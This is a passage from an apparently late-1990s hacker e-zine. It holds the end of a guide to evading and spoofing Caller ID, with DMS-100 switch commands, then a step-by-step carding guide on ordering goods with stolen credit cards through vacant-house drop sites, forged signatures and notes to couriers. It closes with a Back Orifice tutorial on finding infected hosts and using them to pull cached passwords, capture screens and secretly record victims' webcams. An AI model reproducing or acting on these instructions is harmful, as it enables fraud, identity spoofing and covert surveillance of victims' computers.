subpoena the card company). The Caller ID will show the outdial number of the Card issuer. (5) Go through a PBX or WATS extender. Getting a dial tone on a PBX is fairly easy to social engineer, but beyond the scope of this file. This is a well-known and well-loved way of charging phone calls to someone else but it can also be used to hide your identity from a Caller ID box, since the PBX's number is what appears. You can even appear to be in a different city if the PBX you are using is! This isn't very legal at all. But, if you have the talent, use it! (6) I don't have proof of this, but I *think* that a teleconference (Alliance teleconferencing, etc.) that lets you call out to the participants will not send your number in Caller ID. In other words, I am pretty sure the dial tone is not your own. (7) Speaking of dial tones which aren't yours, if you are lucky enough to live in an area with the GTD5 diverter bug, you can use that to get someone else's dial tone and from thence their identity. (8) Still on the subject of dial tones which aren't your own, you can get the same protection as with a payphone, but at greater risk, if you use someone else's line - either by just asking to use the phone (if they'll co-operate after they hear what you're calling about) or by the use of a Beige Box, a hardware diverter or bridge such as a Gold Box, or some other technical marvel. (9) This won't work with an intelligent human on the other end, it leaves you exposed if the called party has a regular Caller ID box with memory, and has many other technical problems which make it tricky at best and unworkable for all but experts. A second Caller ID data stream, transmitted from your line after the audio circuit is complete, will overwrite the true data stream sent by the telco during the ringing. If the line you are calling is a BBS, a VMB, or some other automated system using a serial port Caller ID and software, then you can place your call using *67 first, and then immediately after the other end picks up, send the fake stream. The second stream is what the Caller ID software processes, and you are allowed in. See the technical FAQs below for an idea of the problems behind this method; many can be solved. (10) Someone in alt.2600 (using a stolen AOL account, so I can't credit him or her properly) suggested going through 10321 (now 10-10-321) or 10288. Apparently using a 10xxx even for a local call causes "Out of Area" to show up on the Caller ID display. I live in Canada where we don't have 10xxx dialing so I can't verify nor disprove this. (11) There are 1-900 lines you can call that are designed to circumvent Caller ID, ANI, traces, everything. These services are *very* expensive, some as high as $5.00 a minute, but they include long distance charges. This was first published in 1990 in 2600 magazine, and in 1993 the IIRG reported that 1-900-STOPPER still works. Beware - even if you get a busy signal or no answer, you will get charged at 1-900 rates! Another one published in 2600 in 1990: 1-900-RUN-WELL. That one supposedly allows international calls. I'm not about to call either one to find out. Note that you could still be caught if the operators of these services were to be subpoenaed. (12) Use an analog cellular phone. Most providers of plain old analog service show up on Caller ID as "Private" or "Out of Area" or a main switchboard number for the cell network. This is becoming less and less true as cellular providers move to digital cellular and PCS, which pass the phone's number on Caller ID. Corollary: Rent a cellphone by the day. This might even be cheaper than using a prepaid phone card. 3.2 - Alternate CallerID Information If your under a DMS-100 switch, you can change your Caller ID information to anything that you would like it to be. Not your ANI, just your CND (and your CNAM). You can do it 1 of 3 ways. Hack the switch, Social Engineer, or have a friend on the inside do it. This also is stolen, from usenet. It also is really well written. SDNA (Setting Up DN Attributes) plenty of examples in HELMSMAN (DMS on-line help) The following is accomplished in SERVORD: SDNA [return] [prompt] SNPA: [prompt] OFFICE CODE: [prompt] FROM DIGITS: [prompt] TO DIGITS: [prompt] NET NAME: [prompt] FUNCTION: [prompt] OPTION: [prompt] NPA: [prompt] OFFICE CODE: [prompt] DIGITS: YES to confirm ... updating (does so immediately) SNPA is the area code of the line this is being done on. OFFICE CODE is the exchange/prefix of the line this is being done on. FROM DIGITS is the last four digits of the line this is being done on. TO DIGITS is also the last four digits of the line this is being done on. (It can be done to a series of lines.) NET NAME is PUBLIC FUNCTION - there are three legit functions ADD add. CHA change. DEL delete (self-explanatory) OPTION is ADDRESS (phone number) NPA is area code you want your new Caller ID to be OFFICE CODE is the new exchange/prefix you want to have DIGITS are the last four digits of the new Caller ID to be! YES to confirm ....updating Now you can call anyone who has Caller ID and they will think you are calling from the number you changed it to. Please note the following effects and ramifications: ANI still passes normally. It is only the Caller ID signal which changes. So anyone doing serious investigating at the phone company can still pull Last Incoming Call, etc., correctly. Billing is not affected. That is, you cannot bill to the virtual (artificial number). Call Return will call back the Caller ID, so if it's in the same area, it will call back the number. If the Caller ID you chose is from a different area, Call Return won't work. This is one of my favorites. Since having a non-pub number doesn't stop people from Call Returning you. Now it does!! 800 numbers: AT&T 800's will always get your ANI. MCI tends to usually grab your ANI. Operator 800's will definitely get your ANI. (800-225-5288). Sprint 800's can be configured either way. For example, AOL (America On Line) 800's get ANI. (yes, they resporg to Sprint). However, Western Union, and other Sprint 800's read the Caller ID. Most newer 800's read the Caller ID, but one must test to know for sure. The above method of altering Caller ID on a line is the only legitimate way I have ever found to do so that really works. Can the same thing be done on 5ESS? Not that I am aware of, and I have researched it pretty thoroughly. I have not researched Siemens switches, or others. Tchau for now. Have phun. 4.a - Glossary Glossary ACK -- Acknowledgment ANI -- Automatic Number Identification ASCII -- American Standard Code for Information Interchange BFSK -- Binary Frequency Shift Keying CAS -- CPE Alerting Signal CID -- Caller Identification or Caller ID CIDCW -- Calling Identity Delivery on Call Waiting or Caller ID on Call Waiting CNAM -- Calling Name Delivery CND -- Calling Number Delivery CPE -- Customer Premise Equipment CPNM -- Calling Party Number Message DTMF -- Dual-Tone Multifrequency FCC -- Federal Communications Commission FSK -- Frequency Shift Keying ID -- Identification LATA -- Local Access and Transport Area LSB -- Least Significant Bit LSSGR -- LATA Switching Systems Generic Requirements MDMF -- Multiple Data Message Format OSI -- Open Switch Interval PC -- Personal Computer SAS -- Subscriber Alerting Signal SDMF -- Single Data Message Format SPCS -- Stored Program Control Switching System SS7 -- Signaling System 7 4.b - Resources on the internet http://www.markwelch.com/callerid.htm http://members.xoom.com/hoal/cpid-ani.txt http://bc1.com/users/fixer/files/BEATCID.TXT -hatredonalog ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ 4. Carding.......Unexplored Territory Vol. 2 of 2 ³ ³ by Neptunium Overkill (quixilver@mailexcite.com) ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ DISCLAIMER: The activity described in this article is highly illegal and you can get a long time in jail for doing it. Be careful if you ever do it and REMEMBER, no one is responsible for your actions but yourself. Make sure you read Carding.......Unexplored Territory Vol. 1 of 2, published in DPP 8. INTRO: So you've got yourself some credit card numbers and now you want to buy neet stuff for you and your buds. In this article you will learn how easily and safely order things with your cards. If you read and follow the instructions carefully you will have no trouble receiving your packages. OK, well let's get started. The first thing you will need to do is find a place to drop the stuff you are going to order. Now, if you are a real dope you might be thinking "Hey! I can just get the stuff shipped to my house! The cops will never find out!" Sorry, but that just isn't going to work. Yes, the stuff would probably come as planned but then after the card owner receives the bill and calls the company to complain that they didn't buy any of this, the card company will call the store and ask who the items were shipped to. The store will then pull up the address the gear was shipped to and it will just happen to be your address. I trust that you know what would happen after that. Anyway, you are going to need a drop site. The thing I recommend is an empty house or apartment OR if you are real careful you can have the stuff shipped while the resident of the house is at work. Take a walk around you neighborhood and you are sure to find a good drop site. If you are unsuccessfull you can ask your CLOSE friends if they know of any vacant houses near them. Once you have a place to use, write down the address. You are now finished with step one. The second step is ordering the items. There are three ways to order stuff: www, phone, or mail. To order using the web make sure the company you want to order has internet ordering (duh). If they don't, look around, you can buy all kinds of stuff on the net and there is probably someone who sells what you want via the web. For extra security, you may want to use a PPP/SLIP account other than the one that has your or your parents' name on it or a shell account that you have aquired, but you will probably be just fine using your own account to order the merchandice. Pretty self-explanitory after that. To order by phone, there are two precautions to take: first, don't use your own phone line. Use your beige box and dial away. The other precaution is that if you are going to have to have a somewhat low voice......if you are 16+ then you will pass as an 18 year old, but if you are 12 and sound like a little kid or something, then don't try it. If you are not sure if you could pass as a credit card owner, then get a CLOSE friend with a lower voice to call. The last way to order things is by US Mail. Now, just pick what you want out of the catalog, fill out the order form, but remember: be VERY careful on the signature. Practice a realistic looking signature many times on a sheet of paper until you think it looks belivible. Now, check over your order form, and stick in in the envelope. Now, when you mail the order form, it will probably work fine just to mail it from a public mail box (don't do it from your house), but if you want to be really convincing then find a hacker/phreak/cool person in the city of the cardholder, stick the orderform's envelope in a larger envelope and adress that one to them, then have them mail the order form's envelope (this will make it look like the cardholder is buying someone in your city a birthday present. The third and final step is to pick up the gear. What you will have to do now is write a note for the UPS man. Have it say something like "Hi. I am at work right now so please leave it on the doorstep. Thank you." Make sure you have the note out there before 9 A.M. on the first possible day the package could arrive. This almost always works. Anyway, that's about it. If you have questions you can e-mail me. HEY!!!!!!!: Fast T3 Shells! Always up! For less money than you make in an hour at work! Only $5 a month from www.darksphere.net. Last one there is a rotten mango! -neptunium overkill ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ 5. Back Orifice for Fun and Profit, part 1 of 5 ³ ³ by MMX Killa(help@beer.com) ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Fact: There have been over 250,000 downloads of Back Orifice since it's release in August. Fact: Approximately 74% of Australian Internet providers are infected with Back Orifice.Fact: Back Orifice can be more fun and fulfilling than prank calls. Opinion: Back Orifice can be more fun and fulfilling than masturbation. What do all of these facts mean to you? NOTHING. Anyway, let's say that you were a shrewd hacker punk, and you woke up one Sunday at 3PM, and said "hey! I think I'll take over a random person's computer today!" How would one go about completing such an audacious task? The answer to that, my friend, is Back Orifice. Back Orifice, a tool designed by the Cult of the Dead Cow (I bow to the cow!), is a remote administration tool that was designed to be used for the purposes of good. However, history has shown us that when hackers design tools that are "good", they usually give the hacker a purpose. Take, for example, S.A.T.A.N. SATAN, or System Administrator's Tool for Analyzing Networks, is a portscanner, that allows one to see vulnerabilities on their network. Yes, a sysop can use this to strengthen their network, and yes, a hacker could use this to see where other networks need strengthening. Back Orifice is very similar to this. Back Orifice is a tool that is installed on a person's (target's) computer, that allows the sysop (hacker) to obtain full control of that machine. Back Orifice can log keystrokes, capture screen images, edit the registry, make and break network shares, show cached system passwords, spawn programs, redirect ports, reboot the machine, pop up cute lil dialog boxes, and it also slices, dices, and makes julian fries. Think about that for a moment: you could literally have more power from your home then the person at the keyboard of the machine has. Hell, you could add format commands in someone's autoexec.bat file, you could spawn twenty of those annoying "sheep" programs, and then capture a picture to show all of your friends at school why the new Indian kid is crying in the corner. Why, you might ask? Because he was owned! Let's begin this lesson by going over what's packaged with Back Orifice that you will need to own your neighborhood. First, unzip the file that you downloaded. If you suddenly find yourself in an AOL chat room asking for 31337 WaReZ d00dz to help you run Back Orifice, then I'm sorry, you're beyond help. You'll find afew files. You should find all of these: bo.txt - the user's guide plugin.txt - a text for people who want to write plugins (BUTTplugs) boserve.exe - please, don't run this on your machine. bogui.exe - the Back Orifice GUI client (ie: windows form type) boclient.exe - the Back Orifice command line client (ie: DOS) boconfig.exe - the utility to configue your server before you install it. melt.exe - a decompressorfreeze.exe - a compressor Okay, if you didn't get all of these files, I'd suggest downloading Back Orifice again. Hell, from now on, I'm not typing "Back Orifice". I'm just going to put down "BO". Anyway, the two files that you'll definitely need are boclient.exe and bogui.exe. If you want to install copies of BO on other people's machines, then keep boserve and boconfig. The texts are good references, and the only thing that melt and freeze are good for are downloading screen shots quickly. Command Line client (the most useful for most things) Anyway, let's go over some basic commands. To find and connect to a host, you'll have to use the sweep and host commands. For some reason, I cannot get the sweeper to work in the GUI client. Now, let's say you know the subnet of the person that you're looking for. If that person's IP address usually began with 206.152.172, then that would be the subnet that you would sweep. So you'd type in this:sweep 206.152.172 If you're lucky, you'll see something like this: ---------- Packet received from host 206.152.172.124 port 31337 --------- !PONG!1.20!DEFAULT!------------------------- End of Data ------------------- Congratulations! You found a computer that's been infected with back orifice! Of course, this may not be the computer that you're looking for, but it is at least a computer that you can practice your basic skills on. So how do I do anything from here? I'll look at what I see on my screen, and I'll analyze it. The format for the Pong response is this: !PONG!version!computername! In most cases, you'll be able to tell if this is your target just by the computer name. However, in alot of cases, the computers are just named "DEFAULT", so you'll have to connect to it for more information. It says "Packet received from host 206.152.180.124 port 31337". It doesn't take a genious to figure out that this means that the IP address that you'll use is 206.156.172.124. So to set your client to talk to that host, type in: host 206.156.172.124 Great! You're setup to own that host now. So how can I determine if this is my target or not? Simple, just use the INFO command! The info command gives you some basic info about your target host, such as the user login name, and more. Let's look at a sample response to the command of:info You'll type that, and your target will spew up something like this: ------- Packet received from 206.156.160.101 port 31337 ------- System info for machine 'DEFAULT'Current user: 'Barry'Processor: I586 Win32 on Windows 95 v4.0 build 950 Memory: 39M in use: 90% Page file: 366M free: 335M C:\ - Fixed Sec/Clust: 64 Byts/Sec: 512, Bytes free: 350289920/1279688704 D:\ - CD-ROME:\ - RemovableEnd of system info------- End of data ------- Now of course this is just a sample, and it would be really bad if we were just targeting some lame pedophile who we found by accident. So anyway, let's look at the response. It tells you the computer name, the user that's currently logged in, what kind of processor the computer is running, the operating system that your target is using, memory statistics, and drive information. The string of numbers after the hard drive letter is of course "freespace/totalspace", but for some reason BO is not capable of detecting anything more than 2GB, so FAT32 users will still be listed as 2GB capacity. The next command that we'll learn is the passes command. As you may have already guessed, this will give you information on any password stored in the users cached passwords file. This is MSIE only, so nothing that's a netscape cached password will show. So you'd type in the passes command, and you'll see a response like this: ------- Packet received from 206.152.167.64 port 31337 ------- Password cached by system:index:02(01) len:16(07/12) Resource: 'HUSEMAN' Password: 'X'index:00(04) len:18(05/52) Resource: 'MAPI' Password: 'MAPI' Resource: '*Rna\Worldpath\Chevalier72' Password: 'PMKNC19' index:01(06) len:68(50/92) Resource: '*Rna\Microsoft Internet Referral Service\icwsignup' Password: 'icwsignup'End of cached passwords.ScreenSaver password: 'MILENKO' ------- End of data ------- Now naturally, the last item in this list is the screen saver password. If the computer doesn't have a screen saver password, it'll just say "Unable to read value 'ScreenSave_Data'" Don't worry about it. The "index:" line means shit to a beginner, it's just about where BO found the information. Then "len:" line means how strong the encryption on the password was. Afew tips and tricks about this feature: Any value that starts with *Rna\ is a dialup networking password, with the name for the connection next, and then the user name. The two things that you can out right ignore are the "MAPI" and the "Microsoft Internet Referral Service" passwords. They are on almost every computer, it's just some bullshit about signing up to the internet for the first time.The format for the resource is this: 'NAME OF RESOURCE\USERNAME' Password: 'whatever' Just because the name of a resource is a www.whatever.org, it doesn't mean that the actual place to put in your password is whatever.org. It's a very wierd thing. But for the most part, you can ignore everything but what's the beginning and the end values. Now, you have pretty much already owned this person. But now you wonder, "What are they doing right now?" Well, there are two ways of finding out. One way is to use the PROCLIST command. PROCLIST is a neat feature that allows you to see all of the programs that your target computer is running. Here's an example of a response from a computer (shortened): ------- Packet received from 206.152.167.145 port 31337 -------pid - Executable 4291799303 C:\WINDOWS\SYSTEM\KERNEL32.DLL 4294936047 C:\WINDOWS\SYSTEM\MSGSRV32.EXE4294963087 C:\WINDOWS\SYSTEM\MPREXE.EXE 4294954415 C:\WINDOWS\mediaplt\ecidmn.exe 4294457359 C:\PROGRAM FILES\DR SOLOMON'S\ANTI-VIRUS\WGFE.EXE 4294954603 C:\WINDOWS\SYSTEM\ .EXE 4294468987 C:\PROGRAM FILES\DISTRIBUTED.NET\RC5DESG.EXE 4294460775 C:\WINDOWS\EXPLORER.EXE4294507799 C:\WINDOWS\SYSTEM\SYSTRAY.EXE 4294497487 C:\WINDOWS\YBOT.EXE4294492751 C:\PROGRAM FILES\AIM95\AIM.EXE 4294547167 C:\WINDOWS\SYSTEM\RNAAPP.EXE4294535895 C:\WINDOWS\SYSTEM\tapiexe.exe 4294541983 C:\WINDOWS\SYSTEM\LIGHTS.EXE4294583531 C:\PROGRAM FILES\ICQ\ICQ.EXE 4294609115 C:\INFINET\NETSCAPE\PROGRAM\NETSCAPE.EXEEnd of processes ------- End of data ------- Take note in this to the fact that it shows the hidden system processes such as Kernel32.dll, Msgsrv32.exe, and explorer.exe. And do you want to know a really super neat trick? If you use PROCLIST's sister commands, PROCSPAWN and PROCKILL, you can start and kill programs, respectively. As you're probably not wondering, the numbers next to the file name of the program that's running is the PID. When using the PROCKILL command. So in the example above, the PID for Netscape is 4294609115. So to kill this, I would type in:PROCKILL 4294609115!!!!! Super Genious Idea !!!!! Use the prockill command with the PID of " .exe" and watch as none of your commands go through until they restart the computer! !!!!! Super Genious Idea !!!!! In the same light, if I had uploaded a program to the server, or I just wanted to run a program on their computer, I could use the PROCSPAWN command. To use this, type in PROCSPAWN, followed by the FULL path of the program, including drive letter. So if you wanted to run a file called c:\windows\sol.exe (solitaire), I would type:PROCSPAWN C:\Windows\sol.exe It's alot easier than it seems, isn't it? Suddenly and magically, Solitaire would begin running. It might not popup as the active window, but it would still run and appear in their taskbar. Continuing with the "What are they doing?" theme, you can use a really fun command - the CAPSCREEN command. As you may have guessed from the name, this captures the screen image and saves it to a specified file. This is shockingly similar to the "Print Screen" key on your computer. So, to use this, you'll just type in CAPSCREEN and then the file it should be saved as. So if I wanted to save it as screen.bmp (the format is a bitmap), I would type in:CAPSCREEN c:\screen.bmp The typical response to this is something like this: ------- Packet received from 206.152.167.145 port 31337 ------- Bitmap (800x600x16) captured to c:\screen.bmp------- End of data ------- The format for the response is: Bitmap (WIDTHxHEIGHTxCOLOR DEPTH). For those of you who don't know what color depth is, it's the number of bits used for color assignment. The larger the number, the more bits used, hence the more possible colors. To retrieve this file, you'll have to use the HTTP server, which we'll get into later.!!!!! Super Weird Software Bug !!!!! Sometimes, you'll capture a screen shot that has it's color depth set higher than your video card is set to. If you're running 256 colors, and sometimes even 16-bit High Color you'll run into a weird problem: the colors will be fucked up. I don't believe that there is a solution to this problem other than to just set your video card to a higher color depth. !!!!! Super Weird Software Bug !!!!! Another super fun thing to do is to use their QuickCam or other video capture devices. Sometimes, you get to see who you're owning! The first thing that you'd have to do is find out if they even have a video capture device. Use the LISTCAPS command to get a list of devices. When the packets come back, each capture device (if any) will have a number next to them, usually a 0 or a 1, since most people don't have 3 or more QuickCam's on their comp. Once you have determined that they own a capture device, you can use the CAPFRAME and CAPAVI commands to see what they're doing. The difference between these two is frighteningly obvious. The CAPFRAME command captures one individual frame of video from the capture device, and saves it to a specified file in bitmap format. This is a complex command, so follow along. The format is this: CAPFRAME BITMAPFILENAME devicenumber,width,height,bitplanes So if the person's QuickCam was device 0 on their comp, and I wanted to save a 16-bit, 640x480 image to c:\windows\temp\quickcam.bmp, I would type in: CAPFRAME c:\windows\temp\quickcam.bmp 0,640,480,16 Remember, bitplanes are your color depth. Most people run their computers at 16-bit or 30-bit. However, 256 color mode for older computers is actually 8-bit, so if you're running 256 colors, don't waste video memory with anything higher than 8-bit. Once again, you'd have to retrieve this file with the HTTP server, but we will, soon enough, get into this. The CAPAVI command is in a very similar format to CAPFRAME, so just look: CAPAVI AVIfilename seconds,device,width,height,bitplanes The only difference is that before the device number, I'd put the number of seconds to record. So to record a 10 second, 16-bit, 640x480 from the QuickCam, device 0, saved to c:\windows\temp\quickcam.avi, I would type: CAPAVI c:\windows\temp\quickcam.avi 10,0,640,480,16 And then once again retrieve it with the HTTP server. So how the fuck do you get all of these files that you've just saved on their computer? Simple: Back Orifice has a built in HTTP server, so spiffy that you'll want to run it as soon as you connect to a target host. Now this is really really easy to do, so listen really carefully: It's HTTPON portnumber, so to turn the HTTP server on using port 80 (please, just use 80), I'd use:HTTPON 80 Of course, there is an HTTPOFF command, but since there would really be no reason for you to turn it off, I'm just going to tell you how to use it anyway. Type in HTTPOFF. Done. Of course, you'll need a quality browser like Netscape to do this, because I have never gotten MSIE 4.0 to work properly with this. So fucking download Netscape NOW! Well, for the time being, that's it. Check back the next time DPP publishes an article for more.PLA914's Back Orifice Proposition: Don't ya just hate it sometimes when someone takes over your territory? Well... Why not do this: Prepare a text file that lists your handle, and your territory (the specific subnets, don't just say, "I own 152.*"), and save it as OWNED.TXT. Then, using the HTTP server, upload it to their C: drive. Hopefully, if more people begin to do this, people will stop fucking around with your targets, and you can take over your territory freely. By the way: if you suspect that someone else is connected to the same computer you are, look for text like this:[Lost 4 Packets?]That's the telltale giveaway. -MMX_Killa ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ 6. Outro: Opossum ³ ³ by hatredonalog (hatredonalog@hotmail.com ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Well, DPP is going to die for a while. How long you say? Oh, about 3-4 monthes. After that we'll come back to life, do a reorg of the group, take on some new talent that i've wanted to come on board for a little while (you know who you are) and go through a total change in appearance. At this stage we still look like a bunch of immature script kiddies (*not* what i had intended). The reasons for our temporary death is simple. Our writing/Editing Staff has damn near fallen off the face of the earth. First Dark|||Knight went missing (jail?) and napalmoliv has also disappeared (work and school ate him), Sphinx is without a boxen and the rest of us have gotten pretty lazy. A large majority my time has been taken up by school and work (and sleeping). Even though overkill, mmx_killa, nothingg and myself _could_ run the zine, we haven't had much to publish. I wrote a rather good linux tutural, but due to a computer problem, it was erased. Now im sure it's sitting physically on the drive, but i can't get it. =( Well, that's about the long and short of it. I'm going to be trying to recruit some new writers (who will write stuff!), and i'll probably be the only editor (cause i can get them out on time, due to not having a life). When we do come back, we will have a new look, a new style, and we'll still be your p1mp. -hoal ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ "Sir, We've stopped producing DPP, and if your going to get violent about it I'm going to have to go get my manager..." -hoal "We've stopped producing DPP, now pick up the peices of your shattered life and move on." - Neptunium Overkill